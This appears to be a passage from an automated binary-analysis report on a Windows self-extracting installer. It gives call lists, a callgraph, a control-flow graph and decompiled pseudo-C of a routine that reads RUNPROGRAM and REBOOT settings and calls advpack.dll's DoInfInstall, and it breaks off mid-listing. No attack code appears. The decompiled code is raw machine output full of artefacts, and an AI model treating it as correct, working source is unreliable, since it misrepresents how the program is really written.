2975 f344b9 20 API calls 2973->2975 2976 f3171e _vsnprintf 2974->2976 2975->2968 2977 f32218 2976->2977 2977->2977 2978 f32227 RegSetValueExA RegCloseKey LocalFree 2977->2978 2978->2963 2980 f34016 CreateProcessA 2979->2980 2991 f34106 2979->2991 2981 f34041 WaitForSingleObject GetExitCodeProcess 2980->2981 2982 f340c4 2980->2982 2986 f34070 2981->2986 2985 f36285 GetLastError 2982->2985 2983 f36ce0 4 API calls 2984 f34117 2983->2984 2984->2674 2988 f340c9 GetLastError FormatMessageA 2985->2988 3050 f3411b 2986->3050 2990 f344b9 20 API calls 2988->2990 2989 f34096 CloseHandle CloseHandle 2989->2991 2992 f340ba 2989->2992 2990->2991 2991->2983 2992->2991 2994 f364c2 2993->2994 2995 f3658a CharPrevA 2994->2995 2996 f364d8 GetFileAttributesA 2995->2996 2997 f36501 LoadLibraryA 2996->2997 2998 f364ea 2996->2998 3000 f36508 2997->3000 2998->2997 2999 f364ee LoadLibraryExA 2998->2999 2999->3000 3001 f36ce0 4 API calls 3000->3001 3002 f36513 3001->3002 3002->2701 3004 f32381 3003->3004 3005 f32289 RegOpenKeyExA 3003->3005 3006 f36ce0 4 API calls 3004->3006 3005->3004 3007 f322b1 RegQueryValueExA 3005->3007 3008 f3238c 3006->3008 3009 f322e6 memset GetSystemDirectoryA 3007->3009 3010 f32374 RegCloseKey 3007->3010 3008->2679 3011 f32321 3009->3011 3012 f3230f 3009->3012 3010->3004 3014 f3171e _vsnprintf 3011->3014 3013 f3658a CharPrevA 3012->3013 3013->3011 3015 f3233f RegSetValueExA 3014->3015 3015->3010 3018 f31a9a 3017->3018 3020 f31aaf 3018->3020 3022 f31aba 3018->3022 3036 f3667f 3018->3036 3021 f3667f 2 API calls 3020->3021 3020->3022 3021->3020 3022->2916 3024 f32ad4 GetModuleFileNameA 3023->3024 3025 f32be6 3023->3025 3035 f32b02 3024->3035 3026 f36ce0 4 API calls 3025->3026 3028 f32bf5 3026->3028 3027 f32af1 IsDBCSLeadByte 3027->3035 3028->2935 3029 f32b11 CharNextA CharUpperA 3032 f32b8d CharUpperA 3029->3032 3029->3035 3030 f32bca CharNextA 3031 f32bd3 CharNextA 3030->3031 3031->3035 3032->3035 3034 f32b43 CharPrevA 3034->3035 3035->3025 3035->3027 3035->3029 3035->3030 3035->3031 3035->3034 3041 f365e8 3035->3041 3037 f36689 3036->3037 3038 f366a5 3037->3038 3039 f36648 IsDBCSLeadByte 3037->3039 3040 f36697 CharNextA 3037->3040 3038->3018 3039->3037 3040->3037 3042 f365f4 3041->3042 3042->3042 3043 f365fb CharPrevA 3042->3043 3044 f36611 CharPrevA 3043->3044 3045 f3661e 3044->3045 3046 f3660b 3044->3046 3047 f3663d 3045->3047 3048 f36627 CharPrevA 3045->3048 3049 f36634 CharNextA 3045->3049 3046->3044 3046->3045 3047->3035 3048->3047 3048->3049 3049->3047 3051 f34132 3050->3051 3053 f3412a 3050->3053 3054 f31ea7 3051->3054 3053->2989 3055 f31eba 3054->3055 3056 f31ed3 3054->3056 3057 f3256d 15 API calls 3055->3057 3056->3053 3057->3056 3059 f31ff0 RegOpenKeyExA 3058->3059 3060 f32026 3058->3060 3059->3060 3061 f3200f RegDeleteValueA RegCloseKey 3059->3061 3060->2321 3061->3060 3062 f34ca0 GlobalAlloc 3172 f319e0 3173 f31a03 3172->3173 3174 f31a24 GetDesktopWindow 3172->3174 3176 f31a16 EndDialog 3173->3176 3177 f31a20 3173->3177 3175 f343d0 11 API calls 3174->3175 3178 f31a33 LoadStringA SetDlgItemTextA MessageBeep 3175->3178 3176->3177 3179 f36ce0 4 API calls 3177->3179 3178->3177 3180 f31a7e 3179->3180 3181 f36a20 __getmainargs 3182 f36bef _XcptFilter 3063 f34cd0 3064 f34cf4 3063->3064 3065 f34d0b 3063->3065 3066 f34d02 3064->3066 3067 f34b60 FindCloseChangeNotification 3064->3067 3065->3066 3069 f34dcb 3065->3069 3072 f34d25 3065->3072 3068 f36ce0 4 API calls 3066->3068 3067->3066 3070 f34e95 3068->3070 3071 f34dd4 SetDlgItemTextA 3069->3071 3073 f34de3 3069->3073 3071->3073 3072->3066 3086 f34c37 3072->3086 3073->3066 3091 f3476d 3073->3091 3077 f34e38 3077->3066 3079 f34980 25 API calls 3077->3079 3078 f34b60 FindCloseChangeNotification 3080 f34d99 SetFileAttributesA 3078->3080 3081 f34e56 3079->3081 3080->3066 3081->3066 3082 f34e64 3081->3082 3100 f347e0 LocalAlloc 3082->3100 3085 f34e6f 3085->3066 3087 f34c88 3086->3087 3088 f34c4c DosDateTimeToFileTime 3086->3088 3087->3066 3087->3078 3088->3087 3089 f34c5e LocalFileTimeToFileTime 3088->3089 3089->3087 3090 f34c70 SetFileTime 3089->3090 3090->3087 3109 f366ae GetFileAttributesA 3091->3109 3093 f3477b 3093->3077 3094 f347cc SetFileAttributesA 3095 f347db 3094->3095 3095->3077 3097 f36517 24 API calls 3098 f347b1 3097->3098 3098->3094 3098->3095 3099 f347c2 3098->3099 3099->3094 3101 f347f6 3100->3101 3102 f3480f LocalAlloc 3100->3102 3103 f344b9 20 API calls 3101->3103 3104 f3480b 3102->3104 3106 f34831 3102->3106 3103->3104 3104->3085 3107 f344b9 20 API calls 3106->3107 3108 f34846 LocalFree 3107->3108 3108->3104 3110 f34777 3109->3110 3110->3093 3110->3094 3110->3097 3111 f34ad0 3119 f33680 3111->3119 3114 f34ae9 3115 f34aee WriteFile 3116 f34b14 3115->3116 3117 f34b0f 3115->3117 3116->3117 3118 f34b3b SendDlgItemMessageA 3116->3118 3118->3117 3120 f33691 MsgWaitForMultipleObjects 3119->3120 3121 f336a9 PeekMessageA 3120->3121 3122 f336e8 3120->3122 3121->3120 3123 f336bc 3121->3123 3122->3114 3122->3115 3123->3120 3123->3122 3124 f336c7 DispatchMessageA 3123->3124 3125 f336d1 PeekMessageA 3123->3125 3124->3125 3125->3123 3183 f34a50 3184 f34a66 3183->3184 3185 f34a9f ReadFile 3183->3185 3186 f34abb 3184->3186 3187 f34a82 memcpy 3184->3187 3185->3186 3187->3186 3188 f33450 3189 f334d3 EndDialog 3188->3189 3190 f3345e 3188->3190 3191 f3346a 3189->3191 3192 f3349a GetDesktopWindow 3190->3192 3196 f33465 3190->3196 3193 f343d0 11 API calls 3192->3193 3194 f334ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3193->3194 3194->3191 3195 f3348c EndDialog 3195->3191 3196->3191 3196->3195 3197 f33210 3198 f33227 3197->3198 3199 f3328e EndDialog 3197->3199 3200 f333e2 GetDesktopWindow 3198->3200 3201 f33235 3198->3201 3216 f33239 3199->3216 3203 f343d0 11 API calls 3200->3203 3205 f332dd GetDlgItemTextA 3201->3205 3206 f3324c 3201->3206 3201->3216 3204 f333f1 SetWindowTextA SendDlgItemMessageA 3203->3204 3207 f3341f GetDlgItem EnableWindow 3204->3207 3204->3216 3208 f33366 3205->3208 3217 f332fc 3205->3217 3209 f33251 3206->3209 3210 f332c5 EndDialog 3206->3210 3207->3216 3212 f344b9 20 API calls 3208->3212 3211 f3325c LoadStringA 3209->3211 3209->3216 3210->3216 3213 f33294 3211->3213 3214 f3327b 3211->3214 3212->3216 3235 f34224 LoadLibraryA 3213->3235 3220 f344b9 20 API calls 3214->3220 3217->3208 3219 f33331 GetFileAttributesA 3217->3219 3222 f3333f 3219->3222 3223 f3337c 3219->3223 3220->3199 3221 f332a5 SetDlgItemTextA 3221->3214 3221->3216 3224 f344b9 20 API calls 3222->3224 3225 f3658a CharPrevA 3223->3225 3226 f33351 3224->3226 3227 f3338d 3225->3227 3226->3216 3228 f3335a CreateDirectoryA 3226->3228 3229 f358c8 27 API calls 3227->3229 3228->3208 3228->3223 3230 f33394 3229->3230 3230->3208 3231 f333a4 3230->3231 3232 f3597d 34 API calls 3231->3232 3233 f333c7 EndDialog 3231->3233 3234 f333c3 3232->3234 3233->3216 3234->3216 3234->3233 3236 f34246 GetProcAddress 3235->3236 3239 f343b2 3235->3239 3237 f343a4 FreeLibrary 3236->3237 3238 f3425d GetProcAddress 3236->3238 3237->3239 3238->3237 3240 f34274 GetProcAddress 3238->3240 3241 f344b9 20 API calls 3239->3241 3240->3237 3242 f3428b 3240->3242 3243 f3329d 3241->3243 3244 f34295 GetTempPathA 3242->3244 3249 f342e1 3242->3249 3243->3216 3243->3221 3245 f342ad 3244->3245 3245->3245 3246 f342b4 CharPrevA 3245->3246 3247 f342d0 CharPrevA 3246->3247 3246->3249 3247->3249 3248 f34390 FreeLibrary 3248->3243 3249->3248 3250 f36c03 3251 f36c17 _exit 3250->3251 3252 f36c1e 3250->3252 3251->3252 3253 f36c27 _cexit 3252->3253 3254 f36c32 3252->3254 3253->3254 3126 f34cc0 GlobalFree 3127 f36f40 SetUnhandledExceptionFilter 3255 f34bc0 3256 f34c05 3255->3256 3258 f34bd7 3255->3258 3257 f34c1b SetFilePointer 3256->3257 3256->3258 3257->3258 3259 f330c0 3260 f330de CallWindowProcA 3259->3260 3261 f330ce 3259->3261 3262 f330da 3260->3262 3261->3260 3261->3262 3263 f363c0 3264 f36407 3263->3264 3265 f3658a CharPrevA 3264->3265 3266 f36415 CreateFileA 3265->3266 3267 f3643a 3266->3267 3268 f36448 WriteFile 3266->3268 3271 f36ce0 4 API calls 3267->3271 3269 f36465 CloseHandle 3268->3269 3269->3267 3272 f3648f 3271->3272 3273 f33100 3274 f331b0 3273->3274 3276 f33111 3273->3276 3275 f331b9 SendDlgItemMessageA 3274->3275 3277 f33141 3274->3277 3275->3277 3278 f33149 GetDesktopWindow 3276->3278 3279 f3311d 3276->3279 3281 f343d0 11 API calls 3278->3281 3279->3277 3280 f33138 EndDialog 3279->3280 3280->3277 3282 f3315d 6 API calls 3281->3282 3282->3277 3283 f34200 3284 f3420b SendMessageA 3283->3284 3285 f3421e 3283->3285 3284->3285

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_00F36EF0 1 Function_00F334F0 24 Function_00F343D0 1->24 38 Function_00F344B9 1->38 62 Function_00F33680 1->62 2 Function_00F36CF0 3 Function_00F32BFB 37 Function_00F352B6 3->37 49 Function_00F32CAA 3->49 54 Function_00F31F90 3->54 112 Function_00F32F1D 3->112 4 Function_00F366F9 5 Function_00F370FE 6 Function_00F34EFD 11 Function_00F36CE0 6->11 61 Function_00F34980 6->61 77 Function_00F34B60 6->77 7 Function_00F31FE1 8 Function_00F34FE0 8->6 8->38 69 Function_00F3468F 8->69 9 Function_00F347E0 9->38 60 Function_00F31680 9->60 10 Function_00F331E0 11->2 12 Function_00F324E0 12->11 67 Function_00F3658A 12->67 13 Function_00F319E0 13->11 13->24 14 Function_00F351E5 14->38 64 Function_00F36285 14->64 14->69 15 Function_00F370EB 16 Function_00F31AE8 16->11 33 Function_00F366C8 16->33 35 Function_00F316B3 16->35 16->38 51 Function_00F32AAC 16->51 59 Function_00F31781 16->59 16->60 65 Function_00F31A84 16->65 16->67 111 Function_00F3171E 16->111 17 Function_00F328E8 68 Function_00F32A89 17->68 70 Function_00F32773 17->70 18 Function_00F365E8 19 Function_00F33FEF 19->11 19->38 19->64 108 Function_00F3411B 19->108 20 Function_00F371EF 21 Function_00F36BEF 22 Function_00F336EE 22->11 22->17 31 Function_00F367C9 22->31 22->38 22->68 109 Function_00F3681F 22->109 23 Function_00F317EE 23->11 24->11 25 Function_00F34CD0 25->9 25->11 56 Function_00F34E99 25->56 25->61 25->77 85 Function_00F3476D 25->85 95 Function_00F34C37 25->95 114 Function_00F34702 25->114 26 Function_00F34AD0 26->62 27 Function_00F34CC0 28 Function_00F34BC0 29 Function_00F330C0 30 Function_00F363C0 30->11 30->59 30->67 52 Function_00F36793 31->52 32 Function_00F358C8 32->38 32->60 32->64 32->67 92 Function_00F36648 33->92 34 Function_00F317C8 35->59 36 Function_00F369B0 36->20 39 Function_00F36FBE 36->39 72 Function_00F36C70 36->72 117 Function_00F37000 36->117 37->7 37->11 37->18 53 Function_00F32390 37->53 37->59 38->11 38->31 38->60 38->109 38->111 90 Function_00F36F54 39->90 40 Function_00F318A3 40->11 40->23 41 Function_00F33BA2 41->11 41->16 41->19 41->38 55 Function_00F36495 41->55 41->59 41->64 41->69 81 Function_00F32267 41->81 102 Function_00F3202A 41->102 42 Function_00F372A2 43 Function_00F353A1 43->11 43->60 43->67 43->111 44 Function_00F36FA1 45 Function_00F355A0 45->11 45->38 45->59 45->64 45->67 45->69 75 Function_00F3597D 45->75 80 Function_00F35467 45->80 86 Function_00F36952 45->86 94 Function_00F32630 45->94 107 Function_00F36517 45->107 46 Function_00F34CA0 47 Function_00F31EA7 84 Function_00F3256D 47->84 48 Function_00F36FA5 93 Function_00F3724D 48->93 49->11 49->22 49->38 49->40 49->53 58 Function_00F35C9E 49->58 49->69 49->107 50 Function_00F366AE 51->11 51->18 51->34 51->60 53->11 53->35 53->53 53->60 53->67 54->11 54->38 54->47 55->11 55->59 55->67 56->60 57 Function_00F36298 57->11 57->111 58->10 58->11 58->33 58->38 58->60 58->67 74 Function_00F3667F 58->74 103 Function_00F36E2A 58->103 106 Function_00F35C17 58->106 60->59 61->38 73 Function_00F3487A 61->73 63 Function_00F36380 65->74 66 Function_00F3268B 66->11 66->38 66->111 67->35 70->11 70->59 70->60 70->67 71 Function_00F37270 119 Function_00F3490C 73->119 74->92 75->11 75->38 75->64 75->66 76 Function_00F37060 98 Function_00F37120 76->98 104 Function_00F37010 76->104 78 Function_00F36760 79 Function_00F36A60 79->3 79->76 89 Function_00F37155 79->89 79->93 97 Function_00F36C3F 79->97 118 Function_00F37208 79->118 80->11 80->32 80->43 80->59 80->60 80->64 80->67 80->75 81->11 81->67 81->111 82 Function_00F35164 82->38 82->57 82->69 83 Function_00F34169 83->38 83->69 84->12 85->50 85->107 87 Function_00F34A50 88 Function_00F33450 88->24 90->93 90->118 91 Function_00F36F40 94->11 94->38 96 Function_00F33A3F 96->38 96->64 96->69 96->107 99 Function_00F36A20 100 Function_00F33B26 100->8 100->57 100->107 101 Function_00F34224 101->38 101->60 102->11 102->38 102->67 102->111 103->2 105 Function_00F33210 105->24 105->32 105->38 105->67 105->75 105->101 107->38 108->47 109->4 109->11 110 Function_00F3621E 110->11 110->38 110->64 110->75 112->11 112->14 112->38 112->41 112->45 112->64 112->67 112->82 112->83 112->84 112->96 112->100 112->110 113 Function_00F36C03 113->93 114->35 114->60 115 Function_00F33100 115->24 116 Function_00F34200

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 36 f33ba2-f33bd9 37 f33bdb-f33bee call f3468f 36->37 38 f33bfd-f33bff 36->38 44 f33d13-f33d30 call f344b9 37->44 45 f33bf4-f33bf7 37->45 39 f33c03-f33c28 memset 38->39 41 f33d35-f33d48 call f31781 39->41 42 f33c2e-f33c40 call f3468f 39->42 48 f33d4d-f33d52 41->48 42->44 53 f33c46-f33c49 42->53 55 f33f4d 44->55 45->38 45->44 51 f33d54-f33d6c call f3468f 48->51 52 f33d9e-f33db6 call f31ae8 48->52 51->44 65 f33d6e-f33d75 51->65 52->55 69 f33dbc-f33dc2 52->69 53->44 57 f33c4f-f33c56 53->57 59 f33f4f-f33f63 call f36ce0 55->59 61 f33c60-f33c65 57->61 62 f33c58-f33c5e 57->62 67 f33c67-f33c6d 61->67 68 f33c75-f33c7c 61->68 66 f33c6e-f33c73 62->66 71 f33d7b-f33d98 CompareStringA 65->71 72 f33fda-f33fe1 65->72 73 f33c87-f33c89 66->73 67->66 68->73 76 f33c7e-f33c82 68->76 74 f33de6-f33de8 69->74 75 f33dc4-f33dce 69->75 71->52 71->72 79 f33fe3 call f32267 72->79 80 f33fe8-f33fea 72->80 73->48 82 f33c8f-f33c98 73->82 77 f33f0b-f33f15 call f33fef 74->77 78 f33dee-f33df5 74->78 75->74 81 f33dd0-f33dd7 75->81 76->73 95 f33f1a-f33f1c 77->95 85 f33fab-f33fd2 call f344b9 LocalFree 78->85 86 f33dfb-f33dfd 78->86 79->80 80->59 81->74 89 f33dd9-f33ddb 81->89 83 f33cf1-f33cf3 82->83 84 f33c9a-f33c9c 82->84 83->52 94 f33cf9-f33d11 call f3468f 83->94 91 f33ca5-f33ca7 84->91 92 f33c9e-f33ca3 84->92 85->55 86->77 93 f33e03-f33e0a 86->93 89->78 96 f33ddd-f33de1 call f3202a 89->96 91->55 100 f33cad 91->100 99 f33cb2-f33cc5 call f3468f 92->99 93->77 101 f33e10-f33e19 call f36495 93->101 94->44 94->48 103 f33f46-f33f47 LocalFree 95->103 104 f33f1e-f33f2d LocalFree 95->104 96->74 99->44 112 f33cc7-f33ce8 CompareStringA 99->112 100->99 113 f33f92-f33fa9 call f344b9 101->113 114 f33e1f-f33e36 GetProcAddress 101->114 103->55 108 f33f33-f33f3b 104->108 109 f33fd7-f33fd9 104->109 108->39 109->72 112->83 115 f33cea-f33ced 112->115 126 f33f7c-f33f90 LocalFree call f36285 113->126 116 f33f64-f33f76 call f344b9 FreeLibrary 114->116 117 f33e3c-f33e80 114->117 115->83 116->126 120 f33e82-f33e87 117->120 121 f33e8b-f33e94 117->121 120->121 124 f33e96-f33e9b 121->124 125 f33e9f-f33ea2 121->125 124->125 128 f33ea4-f33ea9 125->128 129 f33ead-f33eb6 125->129 126->55 128->129 130 f33ec1-f33ec3 129->130 131 f33eb8-f33ebd 129->131 133 f33ec5-f33eca 130->133 134 f33ece-f33eec 130->134 131->130 133->134 137 f33ef5-f33efd 134->137 138 f33eee-f33ef3 134->138 139 f33f40 FreeLibrary 137->139 140 f33eff-f33f09 FreeLibrary 137->140 138->137 139->103 140->104
                                                                        C-Code - Quality: 82%
                                                                        			E00F33BA2() {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				short _v300;
                                                                        				intOrPtr _v304;
                                                                        				void _v348;
                                                                        				char _v352;
                                                                        				intOrPtr _v356;
                                                                        				signed int _v360;
                                                                        				short _v364;
                                                                        				char* _v368;
                                                                        				intOrPtr _v372;
                                                                        				void* _v376;
                                                                        				intOrPtr _v380;
                                                                        				char _v384;
                                                                        				signed int _v388;
                                                                        				intOrPtr _v392;
                                                                        				signed int _v396;
                                                                        				signed int _v400;
                                                                        				signed int _v404;
                                                                        				void* _v408;
                                                                        				void* _v424;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t69;
                                                                        				signed int _t76;
                                                                        				void* _t77;
                                                                        				signed int _t79;
                                                                        				short _t96;
                                                                        				signed int _t97;
                                                                        				intOrPtr _t98;
                                                                        				signed int _t101;
                                                                        				signed int _t104;
                                                                        				signed int _t108;
                                                                        				int _t112;
                                                                        				void* _t115;
                                                                        				signed char _t118;
                                                                        				void* _t125;
                                                                        				signed int _t127;
                                                                        				void* _t128;
                                                                        				struct HINSTANCE__* _t129;
                                                                        				void* _t130;
                                                                        				short _t137;
                                                                        				char* _t140;
                                                                        				signed char _t144;
                                                                        				signed char _t145;
                                                                        				signed int _t149;
                                                                        				void* _t150;
                                                                        				void* _t151;
                                                                        				signed int _t153;
                                                                        				void* _t155;
                                                                        				void* _t156;
                                                                        				signed int _t157;
                                                                        				signed int _t162;
                                                                        				signed int _t164;
                                                                        				void* _t165;
                                                                        
                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                        				_t69 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t69 ^ _t164;
                                                                        				_t153 = 0;
                                                                        				 *0xf39124 =  *0xf39124 & 0;
                                                                        				_t149 = 0;
                                                                        				_v388 = 0;
                                                                        				_v384 = 0;
                                                                        				_t165 =  *0xf38a28 - _t153; // 0x0
                                                                        				if(_t165 != 0) {
                                                                        					L3:
                                                                        					_t127 = 0;
                                                                        					_v392 = 0;
                                                                        					while(1) {
                                                                        						_v400 = _v400 & 0x00000000;
                                                                        						memset( &_v348, 0, 0x44);
                                                                        						_t164 = _t164 + 0xc;
                                                                        						_v348 = 0x44;
                                                                        						if( *0xf38c42 != 0) {
                                                                        							goto L26;
                                                                        						}
                                                                        						_t146 =  &_v396;
                                                                        						_t115 = E00F3468F("SHOWWINDOW",  &_v396, 4);
                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                        							L25:
                                                                        							_t146 = 0x4b1;
                                                                        							E00F344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        							 *0xf39124 = 0x80070714;
                                                                        							goto L62;
                                                                        						} else {
                                                                        							if(_v396 != 1) {
                                                                        								__eflags = _v396 - 2;
                                                                        								if(_v396 != 2) {
                                                                        									_t137 = 3;
                                                                        									__eflags = _v396 - _t137;
                                                                        									if(_v396 == _t137) {
                                                                        										_v304 = 1;
                                                                        										_v300 = _t137;
                                                                        									}
                                                                        									goto L14;
                                                                        								}
                                                                        								_push(6);
                                                                        								_v304 = 1;
                                                                        								_pop(0);
                                                                        								goto L11;
                                                                        							} else {
                                                                        								_v304 = 1;
                                                                        								L11:
                                                                        								_v300 = 0;
                                                                        								L14:
                                                                        								if(_t127 != 0) {
                                                                        									L27:
                                                                        									_t155 = 1;
                                                                        									__eflags = _t127 - 1;
                                                                        									if(_t127 != 1) {
                                                                        										L31:
                                                                        										_t132 =  &_v280;
                                                                        										_t76 = E00F31AE8( &_v280,  &_v408,  &_v404); // executed
                                                                        										__eflags = _t76;
                                                                        										if(_t76 == 0) {
                                                                        											L62:
                                                                        											_t77 = 0;
                                                                        											L63:
                                                                        											_pop(_t150);
                                                                        											_pop(_t156);
                                                                        											_pop(_t128);
                                                                        											return E00F36CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                        										}
                                                                        										_t157 = _v404;
                                                                        										__eflags = _t149;
                                                                        										if(_t149 != 0) {
                                                                        											L37:
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												L57:
                                                                        												_t151 = _v408;
                                                                        												_t146 =  &_v352;
                                                                        												_t130 = _t151; // executed
                                                                        												_t79 = E00F33FEF(_t130,  &_v352); // executed
                                                                        												__eflags = _t79;
                                                                        												if(_t79 == 0) {
                                                                        													L61:
                                                                        													LocalFree(_t151);
                                                                        													goto L62;
                                                                        												}
                                                                        												L58:
                                                                        												LocalFree(_t151);
                                                                        												_t127 = _t127 + 1;
                                                                        												_v396 = _t127;
                                                                        												__eflags = _t127 - 2;
                                                                        												if(_t127 >= 2) {
                                                                        													_t155 = 1;
                                                                        													__eflags = 1;
                                                                        													L69:
                                                                        													__eflags =  *0xf38580;
                                                                        													if( *0xf38580 != 0) {
                                                                        														E00F32267();
                                                                        													}
                                                                        													_t77 = _t155;
                                                                        													goto L63;
                                                                        												}
                                                                        												_t153 = _v392;
                                                                        												_t149 = _v388;
                                                                        												continue;
                                                                        											}
                                                                        											L38:
                                                                        											__eflags =  *0xf38180;
                                                                        											if( *0xf38180 == 0) {
                                                                        												_t146 = 0x4c7;
                                                                        												E00F344B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                        												LocalFree(_v424);
                                                                        												 *0xf39124 = 0x8007042b;
                                                                        												goto L62;
                                                                        											}
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											__eflags =  *0xf39a34 & 0x00000004;
                                                                        											if(__eflags == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											_t129 = E00F36495(_t127, _t132, _t157, __eflags);
                                                                        											__eflags = _t129;
                                                                        											if(_t129 == 0) {
                                                                        												_t146 = 0x4c8;
                                                                        												E00F344B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                        												L65:
                                                                        												LocalFree(_v408);
                                                                        												 *0xf39124 = E00F36285();
                                                                        												goto L62;
                                                                        											}
                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                        											_v404 = _t146;
                                                                        											__eflags = _t146;
                                                                        											if(_t146 == 0) {
                                                                        												_t146 = 0x4c9;
                                                                        												__eflags = 0;
                                                                        												E00F344B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                        												FreeLibrary(_t129);
                                                                        												goto L65;
                                                                        											}
                                                                        											__eflags =  *0xf38a30;
                                                                        											_t151 = _v408;
                                                                        											_v384 = 0;
                                                                        											_v368 =  &_v280;
                                                                        											_t96 =  *0xf39a40; // 0x3
                                                                        											_v364 = _t96;
                                                                        											_t97 =  *0xf38a38 & 0x0000ffff;
                                                                        											_v380 = 0xf39154;
                                                                        											_v376 = _t151;
                                                                        											_v372 = 0xf391e4;
                                                                        											_v360 = _t97;
                                                                        											if( *0xf38a30 != 0) {
                                                                        												_t97 = _t97 | 0x00010000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t144 =  *0xf39a34; // 0x1
                                                                        											__eflags = _t144 & 0x00000008;
                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                        												_t97 = _t97 | 0x00020000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t144 & 0x00000010;
                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                        												_t97 = _t97 | 0x00040000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t145 =  *0xf38d48; // 0x0
                                                                        											__eflags = _t145 & 0x00000040;
                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                        												_t97 = _t97 | 0x00080000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t145;
                                                                        											if(_t145 < 0) {
                                                                        												_t104 = _t97 | 0x00100000;
                                                                        												__eflags = _t104;
                                                                        												_v360 = _t104;
                                                                        											}
                                                                        											_t98 =  *0xf39a38; // 0x0
                                                                        											_v356 = _t98;
                                                                        											_t130 = _t146;
                                                                        											 *0xf3a288( &_v384);
                                                                        											_t101 = _v404();
                                                                        											__eflags = _t164 - _t164;
                                                                        											if(_t164 != _t164) {
                                                                        												_t130 = 4;
                                                                        												asm("int 0x29");
                                                                        											}
                                                                        											 *0xf39124 = _t101;
                                                                        											_push(_t129);
                                                                        											__eflags = _t101;
                                                                        											if(_t101 < 0) {
                                                                        												FreeLibrary();
                                                                        												goto L61;
                                                                        											} else {
                                                                        												FreeLibrary();
                                                                        												_t127 = _v400;
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags =  *0xf39a40 - 1; // 0x3
                                                                        										if(__eflags == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags =  *0xf38a20;
                                                                        										if( *0xf38a20 == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags = _t157;
                                                                        										if(_t157 != 0) {
                                                                        											goto L38;
                                                                        										}
                                                                        										_v388 = 1;
                                                                        										E00F3202A(_t146); // executed
                                                                        										goto L37;
                                                                        									}
                                                                        									_t146 =  &_v280;
                                                                        									_t108 = E00F3468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                        									__eflags = _t108;
                                                                        									if(_t108 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									__eflags =  *0xf38c42;
                                                                        									if( *0xf38c42 != 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                        									__eflags = _t112 == 0;
                                                                        									if(_t112 == 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									goto L31;
                                                                        								}
                                                                        								_t118 =  *0xf38a38; // 0x0
                                                                        								if(_t118 == 0) {
                                                                        									L23:
                                                                        									if(_t153 != 0) {
                                                                        										goto L31;
                                                                        									}
                                                                        									_t146 =  &_v276;
                                                                        									if(E00F3468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                        										goto L27;
                                                                        									}
                                                                        									goto L25;
                                                                        								}
                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                        									__eflags = _t118 & 0x00000002;
                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                        										goto L62;
                                                                        									}
                                                                        									_t140 = "USRQCMD";
                                                                        									L20:
                                                                        									_t146 =  &_v276;
                                                                        									if(E00F3468F(_t140,  &_v276, 0x104) == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                        										_t153 = 1;
                                                                        										_v388 = 1;
                                                                        									}
                                                                        									goto L23;
                                                                        								}
                                                                        								_t140 = "ADMQCMD";
                                                                        								goto L20;
                                                                        							}
                                                                        						}
                                                                        						L26:
                                                                        						_push(_t130);
                                                                        						_t146 = 0x104;
                                                                        						E00F31781( &_v276, 0x104, _t130, 0xf38c42);
                                                                        						goto L27;
                                                                        					}
                                                                        				}
                                                                        				_t130 = "REBOOT";
                                                                        				_t125 = E00F3468F(_t130, 0xf39a2c, 4);
                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                        					goto L25;
                                                                        				} else {
                                                                        					goto L3;
                                                                        				}
                                                                        			}





























































                                                                        0x00f33baa
                                                                        0x00f33bb0
                                                                        0x00f33bb7
                                                                        0x00f33bc0
                                                                        0x00f33bc2
                                                                        0x00f33bc9
                                                                        0x00f33bcb
                                                                        0x00f33bcf
                                                                        0x00f33bd3
                                                                        0x00f33bd9
                                                                        0x00f33bfd
                                                                        0x00f33bfd
                                                                        0x00f33bff
                                                                        0x00f33c03
                                                                        0x00f33c03
                                                                        0x00f33c11
                                                                        0x00f33c16
                                                                        0x00f33c19
                                                                        0x00f33c28
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33c30
